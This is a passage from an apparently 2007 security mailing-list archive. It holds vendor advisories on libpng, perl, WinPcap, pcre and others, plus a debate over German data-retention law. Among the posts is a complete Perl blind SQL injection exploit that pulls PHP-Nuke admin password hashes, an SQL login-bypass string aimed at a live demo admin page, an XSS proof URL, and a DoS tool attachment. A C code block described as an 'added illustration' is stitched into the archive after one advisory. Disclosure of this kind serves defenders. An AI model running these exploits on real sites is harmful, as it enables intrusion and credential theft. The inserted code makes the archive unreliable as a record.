right domain names (with lots of A records) and DNS servers (open,
recursive), you can easily get a traffic multiplication effect.
In a single word, it's a DoS. Enjoy.

CtrlAltCa


[Attachment: alice-0.1.tar.gz (application/gzip)]


FLEA-2007-0065-1 libpng

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0065-1
Published: 2007-11-11

Rating: Minor

Updated Versions:
libpng=/[EMAIL PROTECTED]:devel//1/1.2.22-1-0.1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5266
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5267
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5268
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5269

Description:
Previous versions of the libpng package can cause applications to
crash when loading malformed PNG files.  It is not currently known
that this vulnerability can be exploited to execute malicious code.

- ---

Copyright 2007 Foresight Linux Project
Portions Copyright 2007 rPath Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)

iQIVAwUBRzfbdNfwEn07iAtZAQJorQ//XpFcKedmytQceCut4A3lgvjh/FXUHlkh
wvU6CWI8B9jvDkmd5xH+kGsq+nsYe9VO7kcGDh634FqrAeCVuFFZED7p/IP1hQRC
jn7FZQV3vxS+R/iV22iySXKHy1309rOJVR6b2r/TwS0C0wer47CZZhTcnoGV0+TC
O13gl9MR1O0PsPnIEEU4Xts9mEGfELtnEDfvTxWFKGgzpIGxSXeL1xqFX1KjdjWb
HN8GuWDbjOjmawoj/S7nMX92nts65+IjaVEBbXyNz9K6Te8/BDqJM5XyLnAodoSI
+cJUp7qvr84uYQ602/QAsWkWKA7KHuh7E6/VZOvSp/9Y2H2zCHb+s8O6AvXHgo1z
iDkHLT9mSxh2LuykXt+f7WI1ltrPSKyOsckvh4hoiu234Cn9wbE8H/l6/0MtWrRZ
/e19dkcCJB3cKbBvc2mtzBIzhLMZ9JMCdduDLLvFAacRcjviNQCX+mu/OK6/fP9Y
1MzYD2C+s1wHnVL7nn5XU8+wByenTYlVy2v/azMuhNK1FTS0roYlnnvVThhQfTcg
E/ujxxpwFR5fS9SKP0zMzwOaA0eOQZ/fEHSdWD22cYhMIG7vUFiJ1i0cdRp0aETb
eV+LWSKB3i6fkFPYjDS6Dr4KCvsLbXiitDhfbzPVuuPsWkSLOvoIJb/skKoPGRGm
zh3T+TIN1mA=
=X58H
-END PGP SIGNATURE-


Cisco IOS Shellcode

2007-11-12 Thread Research
High quality versions of the three Cisco IOS shellcode demonstration
videos have now been released:

http://www.irmplc.com/index.php/153-Embedded-Systems-Security



FLEA-2007-0069-1 perl

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0069-1
Published: 2007-11-11

Rating: Minor

Updated Versions:
perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Description:
Previous versions of the perl package contain a buffer overflow in the
regular expression parsing code which could allow an attacker to execute
arbitrary code via a program which uses perl to parse untrusted input as a
regular expression.

Foresight Linux does not include any such program by default.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)
=p0Vt
-END PGP SIGNATURE-


Re: Standing Up Against German Laws - Project HayNeedle

2007-11-12 Thread johan beisser


On Nov 10, 2007, at 9:28 AM, Paul Sebastian Ziegler wrote:

> The mechanism is quite easy: It searches Google for random words and
> picks random pages among the results, then spiders from there (well it
> is spidering except that it only follows one URL at a time within a
> session thus simulating a user).

There are a few things wrong with this approach. Most of them were
outlined by Bruce Schneier when he reviewed "TrackMeNot"[1] last year.

The same issues with TrackMeNot apply to Hayneedle, including
potential false positives, and a list of word combinations that can be
filtered out easily, and well, the list goes on.

[1] http://www.schneier.com/blog/archives/2006/08/trackmenot_1.html



iDefense Security Advisory 11.12.07: WinPcap NPF.SYS bpf_filter_init Arbitrary Array Indexing Vulnerability

2007-11-12 Thread iDefense Labs
iDefense Security Advisory 11.12.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 12, 2007

I. BACKGROUND

WinPcap is a software package that facilitates real-time link-level
network access for Windows-based operating systems. A wide range of
open-source projects, including Wireshark, use it. More information is
available at the project's web site at the following URL.

http://www.winpcap.org/

II. DESCRIPTION

Local exploitation of an invalid array indexing vulnerability in the
NPF.SYS device driver of WinPcap allows attackers to execute arbitrary
code in kernel context.

The problem specifically exists within the bpf_filter_init function. In
several places throughout this function, values supplied from a
potential attacker are used as array indexes without proper bounds
checking. By making IOCTL requests with specially chosen values,
attackers are able to corrupt the stack, or pool memory, within the
kernel.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in kernel
context.

The vulnerable device driver is loaded when WinPcap is initialized. This
driver can be set to load on start-up depending on a choice made at
installation time. However, this is not the default setting.

Normally, the device driver is not loaded until an administrator
utilizes a WinPcap dependent application. Once they do, it will become
accessible to normal users as well. When a program using this driver
exits, it is not unloaded. Attackers will continue to have access until
the driver is manually unloaded.

If the option to allow normal user access was chosen at installation
time, attackers will always have access to this device driver.
Consequently, a local attacker without administrator privileges would
have access to sniff, as well as exploit this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
4.0.1 of WinPcap as included in Wireshark 0.99.6a. The version of
NPF.SYS tested was 4.0.0.901. iDefense suspects older versions to also
be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

VI. VENDOR RESPONSE

The WinPcap Team has addressed this vulnerability by releasing version
4.0.2 of the WinPcap software. For more information, see the following
URL.

http://www.winpcap.org/misc/changelog.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5756 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/30/2007  Initial vendor notification
10/30/2007  Initial vendor response
11/12/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
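As an added illustration of the bounds check the advisory says is missing (example code, not WinPcap's NPF.SYS source): a validator for a BSD-style filter program that rejects any scratch-memory index or jump target outside its array before the program taken from an IOCTL buffer is installed. The instruction layout, BPF_MEMWORDS, BPF_MAXINSNS and the handler shape are assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added illustration, not WinPcap's code: instruction layout and scratch
 * memory size follow the classic BSD packet-filter design (assumed here). */
#define BPF_MEMWORDS 16           /* scratch words addressed by insn->k    */
#define BPF_MAXINSNS 512          /* longest program this handler accepts  */

#define BPF_CLASS(c) ((c) & 0x07)
#define BPF_LD   0x00
#define BPF_LDX  0x01
#define BPF_ST   0x02
#define BPF_STX  0x03
#define BPF_JMP  0x05
#define BPF_RET  0x06
#define BPF_MODE(c)  ((c) & 0xe0)
#define BPF_MEM  0x60
#define BPF_OP(c)    ((c) & 0xf0)
#define BPF_JA   0x00

struct bpf_insn { uint16_t code; uint8_t jt; uint8_t jf; uint32_t k; };

/* Returns 1 if every scratch-memory index and jump target in prog[] is in
 * bounds, 0 otherwise. k, jt and jf arrive in the IOCTL buffer, so each is
 * compared with the array it would index before any use. */
int bpf_validate_program(const struct bpf_insn *prog, size_t len)
{
    if (prog == NULL || len == 0 || len > BPF_MAXINSNS)
        return 0;
    for (size_t i = 0; i < len; i++) {
        const struct bpf_insn *p = &prog[i];
        size_t remaining = len - (i + 1);     /* insns after this one */
        switch (BPF_CLASS(p->code)) {
        case BPF_LD:
        case BPF_LDX:
            if (BPF_MODE(p->code) == BPF_MEM && p->k >= BPF_MEMWORDS)
                return 0;                     /* mem[k] read out of range */
            break;
        case BPF_ST:
        case BPF_STX:
            if (p->k >= BPF_MEMWORDS)
                return 0;                     /* mem[k] write out of range */
            break;
        case BPF_JMP:                         /* targets are relative to i+1 */
            if (BPF_OP(p->code) == BPF_JA) {
                if (p->k >= remaining)
                    return 0;
            } else if (p->jt >= remaining || p->jf >= remaining) {
                return 0;
            }
            break;
        case BPF_RET:
            break;
        default:
            return 0;                         /* unknown opcode class */
        }
    }
    return BPF_CLASS(prog[len - 1].code) == BPF_RET;  /* never run off the end */
}

/* Shape of the IOCTL handler: the raw buffer is sized before it is
 * reinterpreted as instructions, copied once (no re-reads of user memory),
 * and installed only if validation passes. Returns 1 on success. */
int install_filter_from_ioctl(const void *buf, size_t buflen,
                              struct bpf_insn *out, size_t out_cap, size_t *out_len)
{
    if (buf == NULL || out == NULL || out_len == NULL ||
        buflen == 0 || buflen % sizeof(struct bpf_insn) != 0)
        return 0;                             /* missing, truncated or misaligned */
    size_t n = buflen / sizeof(struct bpf_insn);
    if (n > out_cap)
        return 0;
    memcpy(out, buf, buflen);                 /* copy once, validate the copy */
    if (!bpf_validate_program(out, n))
        return 0;
    *out_len = n;
    return 1;
}
```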


FLEA-2007-0067-1 pidgin

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0067-1
Published: 2007-11-11

Rating: Minor

Updated Versions:
pidgin=/[EMAIL PROTECTED]:1-devel//1/2.2.2-1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4999
http://www.pidgin.im/news/security/?id=24

Description:
Previous versions of pidgin are vulnerable to a denial-of-service when
pidgin has been configured to use HTML logging. Logging is not enabled by
default, so the default install of Foresight Linux is not vulnerable to
this issue.

---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html


FLEA-2007-0064-1 pcre

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0064-1
Published: 2007-11-11

Rating: Moderate

Updated Versions:
pcre=conary.rpath.com at rpl:1/7.4-0.2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1660
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1661
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1662
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4766
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4767
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4768

Description:
Previous versions of the pcre package contain multiple vulnerabilities
which may allow an attacker to execute arbitrary code.

The pcre library and utilities are not known to be exposed via any
privileged or remote interfaces within Foresight Linux by default, but many
applications linked to the pcre library are routinely exposed to untrusted
data.

---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html


CVE-2007-3694: Cross site scripting (XSS) in broadcast machine

2007-11-12 Thread Hanno Böck
Source:
http://int21.de/cve/CVE-2007-3694-bm.html

Cross site scripting (XSS) in broadcast machine

References
 http://www.getmiro.com/create/broadcast/
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3694

Description
 Cross site scripting describes attacks that allow inserting malicious HTML or
 JavaScript code via GET or POST forms. This can be used to steal session
 cookies.
 Broadcast machine is a web-based video platform tool. Its login form is
 vulnerable to XSS.

Sample code
 http://somesite.com/login.php"; method="post">
 
 

Workaround/Fix
 Vendor considers broadcast machine dead software and won't provide any
 updates. However, it's still used on some live sites on the internet.

CVE Information
 The Common Vulnerabilities and Exposures (CVE) project has assigned the name
 CVE-2007-3694 to this issue. This is a candidate for inclusion in the CVE
 list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright
 This vulnerability was discovered by Hanno Boeck of schokokeks.org
 webhosting. It's licensed under the creative commons attribution license.

Hanno Boeck, 2007-11-12, http://www.hboeck.de




PHP-Nuke Module Advertising Blind SQL Injection

2007-11-12 Thread Guns
#!/usr/bin/perl
#Product: PHP-Nuke Module Advertising
#BugFounder: 0x90
#HomePage: WwW.0x90.COM.Ar
#Problem: Blind SQL Injection

use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;

my $host = "http://[url]/modules.php?name=Advertising";

my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(POST => $host);

my $post;
my $inicio;
my $risposta;
my $fine;
my $tiempodefault;
my $tiempo;
my $i;
my $j;
my $hash;
my @array;

# ASCII codes of the hex digits 0-9 and a-f
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

# baseline: how long a normal request takes
$post="login=a&pass=a&op=client_valid";
$tiempodefault=richiesta($post);
$hash="";

# Resulting query:
#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT 0,0,0,0,0,0,
#IF((ASCII(SUBSTRING(`pwd`,1,1))=112),benchmark(2,CHAR(0)),'falso') FROM
#nuke_authors WHERE `radminsuper`=1/*

for ($i=1;$i<33;$i++)
{
 for ($j=0;$j<16;$j++)
 {
  $post="login=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i .
        ",1))=".$array[$j]."),benchmark(2,CHAR(0)),'falso') FROM nuke_authors " .
        "WHERE `radminsuper`=1/*&pass=a' UNION SELECT 0,0,0,0,0,0, " .
        "IF((ASCII(SUBSTRING(`pwd`," . $i .
        ",1))=".$array[$j]."),benchmark(2,CHAR(0)),'falso') FROM nuke_authors " .
        "WHERE `radminsuper`=1/*&op=client_valid";
  $tiempo=richiesta($post);
  aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
  if($tiempo>10)
  {
   # repeat the request to confirm the slow response
   $tiempo=richiesta($post);
   aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
   if($tiempo>10)
   {
    $hash .=chr($array[$j]);
    aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
    $j=200; # leave the inner loop
   }
  }
 }
 if($i==1)
 {
  if($hash eq "")
  {
   $i=200; # nothing matched for the first character: stop
   print "El atake Fallo\n";
  }
 }
}

print "Atake Terminado\n\n";
system("pause");

# send one POST request and return the response time in seconds
sub richiesta{
 $post=$_[0];
 $metodo->content_type('application/x-www-form-urlencoded');
 $metodo->content($post);
 $inicio=Time::HiRes::time();
 $risposta=$useragent->request($metodo);
 $risposta->is_success or die "$host : ",$risposta->message,"\n";
 $fine=Time::HiRes::time();
 $tiempo=$fine-$inicio;
 return $tiempo;
}

# redraw the status screen
sub aggiorna{
 system("cls");
 @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
 print "PHP-Nuke Module Advertising Blind SQL Injection\n";
 print "by 0x90\n";
 print "Visit: WwW.0x90.CoM.Ar\n\n";
 print "Victima : " . $_[0] . "\n";
 print "Tiempo Default : " . $_[1] . " secondi\n";
 print "Hash Bruteforce : " . chr($array[$_[2]]) . "\n";
 print "Bruteforce n Caracter Hash : " . $_[5] . "\n";
 print "Tiempo sql : " . $_[4] . " secondi\n";
 print "Hash : " . $_[3] . "\n";
}


PeopleAggregatory security advisory - re CVE-2007-5631

2007-11-12 Thread phil
Hi all,

This is a notification that the remote file inclusion vulnerabilities reported
in CVE-2007-5631 have been fixed in PeopleAggregator v1.2pre6-release-55, and
are not exploitable if PHP's register_globals directive is disabled.

CVE entry: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5631

-
Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6
allow remote attackers to execute arbitrary PHP code via a URL in the
current_blockmodule_path parameter to (1)
AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2)
ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3)
MembersFacewallModule/MembersFacewallModule.php, (4)
NewestGroupsModule/NewestGroupsModule.php, (5)
UploadMediaModule/UploadMediaModule.php, and (6)
VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and
(7) the path_prefix parameter to several components.
-

Notes from vendor: To be exploitable, the web server must be configured with
PHP's register_globals directive ON.  To fix a vulnerable installation, either
turn register_globals OFF in php.ini or via the php_flag Apache option, or
upgrade to v1.2pre6-release-55.

Advisory blog post: http://www.myelin.co.nz/post/2007/11/12/#200711121

Upgrade instructions:

- If installed via Subversion, 'svn update' in the root of your PeopleAggregator
install.

- If installed via tarball, download the latest tarball from
http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-55.tar.gz
and copy all files over those from your existing installation.

Regards,

Phillip Pearson
Broadband Mechanics


FLEA-2007-0068-1 ruby

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0068-1
Published: 2007-11-11

Rating: Minor

Updated Versions:
ruby=/[EMAIL PROTECTED]:devel//1/1.8.6_p110-1-0.1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5162

Description:
Previous versions of the ruby package include a library, Net::HTTPS, which
does not properly verify the CN (common name) field in ssl certificates,
making it easier to perform a man-in-the-middle attack.

It is believed that Foresight Linux does not include any programs which
rely on this feature of the Net::HTTPS library, and so is not affected by
default.

---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html


Re: [Full-disclosure] Standing Up Against German Laws - Project HayNeedle

2007-11-12 Thread Jan Newger
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Paul Sebastian Ziegler wrote:
> > Dear Infosec community,
> >
> > as most of you may have heard the German government passed a law today
> > that will lead to all connections being logged for 6 months. This
> > includes phone calls as well as all internet connections.
NO! This is totally WRONG! The only thing which is logged, in the case
of internet connectivity, is your IP you got from the ISP. Not even
connections are logged! This is important to understand since many
people are misinformed this way. Read
http://www.vorratsdatenspeicherung.de/content/view/78/86/lang,de/#Umsetzung_in_Deutschland

greetz
Jan


Standing Up Against German Laws - Project HayNeedle

2007-11-12 Thread Paul Sebastian Ziegler
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Dear Infosec community,

as most of you may have heard the German government passed a law today
that will lead to all connections being logged for 6 months. This
includes phone calls as well as all internet connections.

This is madness for various apparent reasons. In times like these it is
necessary to stand up against it. Of course not by committing crimes but
by attacking the flawed logic behind those laws itself.

There are many approaches to this. And I am sure (and I really hope)
that there will be many more taken. This is just one approach that came
to my mind today.

Introducing Project HayNeedle.
A tiny spider-like program written in C# that will create connection
sessions on its own, thus trying to create plausible deniability. It
runs within the .NET framework and was tested on Linux and Windows XP.
If it runs on your OS, drop me a line; if it doesn't, send me a report.
It should run on almost any OS supporting Mono.

The mechanism is quite easy: It searches Google for random words and
picks random pages among the results, then spiders from there (well it
is spidering except that it only follows one URL at a time within a
session thus simulating a user).

A long description of the idea behind it and the technique as well as
downloads of the sourcecode and binary can be found here (English and
German version):
http://observed.de/?entnum=126

Project HayNeedle is released under the GPLv2. So any form of patches,
ideas and constructive criticism is welcome. However, for the sake of
everyone's nerves I will not reply to any sort of aggressive and/or
flaming mails.

Many Greetings
Paul Sebastian Ziegler


Oracle 0-day to get SYSDBA access

2007-11-12 Thread pete
Tanel Poder has found a way to get SYSDBA access to the Oracle database by
utilising a user who has the BECOME USER system privilege, execute privileges
on KUPP$PROC.CHANGE_USER and CREATE SESSION. He shows how a user with these
privileges can become SYS (but not SYSDBA) and then use an immediate debug
event to cause a debugger to flip the SYSDBA bit in the PGA to set a dedicated
server session to a SYSDBA one; from there the user can do anything else. The
user needs to have these privileges so it's not an open and shut case, but
serious in that a privilege escalation is still possible. Tanel's post is here:
http://blog.tanelpoder.com/2007/11/10/oracle-security-all-your-dbas-are-sysdbas-and-can-have-full-os-access/
and my blog entry / analysis is here:
http://www.petefinnigan.com/weblog/archives/1126.htm


cheers


Pete


FLEA-2007-0066-1 ImageMagick

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0066-1
Published: 2007-11-11

Rating: Moderate

Updated Versions:
ImageMagick=/[EMAIL PROTECTED]:1-devel//1/6.3.6.9-1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4985
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4986
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4987
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988

Description:
Previous versions of the ImageMagick package are vulnerable to multiple
attacks whereby an attacker might be able to execute arbitrary code by
coercing the user into opening specially-crafted files with ImageMagick.

---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html


FLEA-2007-0063-1 perl

2007-11-12 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0063-1
Published: 2007-11-09

Rating: Minor

Updated Versions:
perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-2

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Description:
Previous versions of the perl package contain weaknesses when evaluating
regular expressions.

If a system is serving a perl-based web application that evaluates
remote input as a regular expression, an attacker may be able to
exploit these weaknesses to execute arbitrary, attacker-provided code on
the system, potentially elevating this to a remote, deterministic
unauthorized access vulnerability.

Foresight Linux does not, by default, enable or contain any such services.

---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html


Eggblog v3.1.0 XSS Vulnerability

2007-11-12 Thread mesut
H - Security Labs

Eggblog v3.1.0 Security Advisory

ID : HSEC#2007

General Information
--

Name : EggBlog v.3.1.0
Vendor HomePage : http://sourceforge.net/projects/eggblog/
Platforms : PHP && MySQL
Vulnerability Type : Input Validation Error

Timeline
-

08 October  2007  -- Vendor Contacted
30 October  2007  -- Vendor Replied
11 November 2007  -- New Release
11 November 2007  -- Advisory Released

What is Eggblog

eggblog is a free PHP & MySQL blogging package. Features include an internal
search engine, photo albums, forums, plug-ins, guest comments to blog articles,
automatic monthly archiving of blog articles and RSS XML feeds for both the
blog and forums.

I discovered the security holes when I was testing it for my personal web blog.

Vulnerability Overview

The script is vulnerable to XSS attacks.

Details About Vulnerability

XSS Vulnerability (home/rss.php)

At rss.php lines 6-7 there are unfiltered PHP_SELFs that can be used for
XSS attacks.

-
".$_SERVER['SERVER_NAME'].str_replace("/home/rss.php","",$_SERVER['PHP_SELF'])."/rss/blog.php
".$_SERVER['SERVER_NAME'].str_replace("/home/rss.php","",$_SERVER['PHP_SELF'])."/rss/topics.php
-

The attacker can successfully launch XSS attacks by loading the payload onto
the URL after home\rss.php. For example:

http://www.example.com/home/rss.php/alert(1)

Solutions
---

Download the new release: EggBlog v3.1.1

Credits
---

The vulnerabilities were found on 08 October 2007
by Mesut Timur <[EMAIL PROTECTED]>
H - Security Labs, http://www.h-labs.org
Gebze Institute of Technology, Computer Engineering, http://www.gyte.edu.tr

References
---

http://sourceforge.net/forum/forum.php?forum_id=753622
http://www.eggblog.net
http://sourceforge.net/projects/eggblog/

Original Advisory:
http://www.h-labs.org/blog/2007/11/11/eggblog_v3_1_0_xss_issues.html

Mesut TIMUR
http://www.h-labs.org
H - Security Labs Security Editor
GYTE Computer Engineering



Re: Re: Simple Machine Forum - Private section/posts/info disclosure

2007-11-12 Thread rx
So let me get this straight, you are saying that when you search as admin, you
can find posts from the VIP section, that admin can normally access (what a
surprise), but when you log off and act as a non-logged-in user, you can't find
them? Or you can't just speak proper English and we can't understand you? (maybe
it's a problem for Czech guys like me or Jindrich though)


[SECURITY] [DSA 1405-2] New zope-cmfplone packages fix regression

2007-11-12 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--
Debian Security Advisory DSA 1405-2                     [EMAIL PROTECTED]
http://www.debian.org/security/                         Thijs Kinkhorst
November 11th, 2007                     http://www.debian.org/security/faq
--

Package: zope-cmfplone
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2007-5741
Debian Bug : 449523

The zope-cmfplone update in DSA 1405 introduced a regression. This update
corrects this flaw. For completeness, the original advisory text below:

It was discovered that Plone, a web content management system, allows
remote attackers to execute arbitrary code via specially crafted web
browser cookies.

The oldstable distribution (sarge) is not affected by this problem.

For the stable distribution (etch) this problem has been fixed in
version 2.5.1-4etch2.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your zope-cmfplone package.


Upgrade Instructions
--

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
---

  Source archives:


http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch2.dsc
  Size/MD5 checksum: 1114 c4e8894601f85060c50ba1eb0823097d

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch2.diff.gz
  Size/MD5 checksum:11213 fdecf98503f9593ebfea4f286608740e

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1.orig.tar.gz
  Size/MD5 checksum:  1064993 b48215d46aafa9e1f12196263d86a191

  Architecture independent components:


http://security.debian.org/pool/updates/main/z/zope-cmfplone/plone-site_2.5.1-4etch2_all.deb
  Size/MD5 checksum: 9900 d8e5a2a383e6dda0e280a71d050b1338

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch2_all.deb
  Size/MD5 checksum:  1190836 1dae183bffb2bdd44e304cb457edd234


  These files will probably be moved into the stable distribution on
  its next update.

--
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/



Aria-Security.Net Research: Rapid Classified HotList Image

2007-11-12 Thread Advisory
Aria-Security Team,

http://Aria-Security.net

---

Shout Outs: AurA, imm02tal

Vendor: http://www.freshink.net/rc-links.htm

Demo: http://www.lite.freshink.net/admin_logon.asp

Google Search: Developed by: GA Soft


Username: anything' OR 'x'='x

password: anything' OR 'x'='x


Regards,

The-0utl4w

From Aria-Security.Net



[48Bits Advisory] QuickTime Panorama Sample Atom Heap Overflow

2007-11-12 Thread [48bits] vulndev
[48bits Advisory] QuickTime Panorama Sample Atom Heap Overflow

Abstract:

QuickTime is prone to a heap overflow vulnerability when parsing malformed
Panorama Sample Atoms, which are used in QuickTime Virtual Reality Movies.
This vulnerability allows attackers to execute code on vulnerable
installations. Successful exploitation via web browser requires that the
attacker trick the user into visiting a specially crafted webpage.

Affected versions :

Tested with QuickTime VR extension 7.2.0.240 included with QuickTime Player 7.2
Patched in QuickTime 7.3

Original advisory and analysis at:

http://www.48bits.com/advisories/qt_pdat_heapbof.pdf

Credit :

Mario Ballano from 48bits.com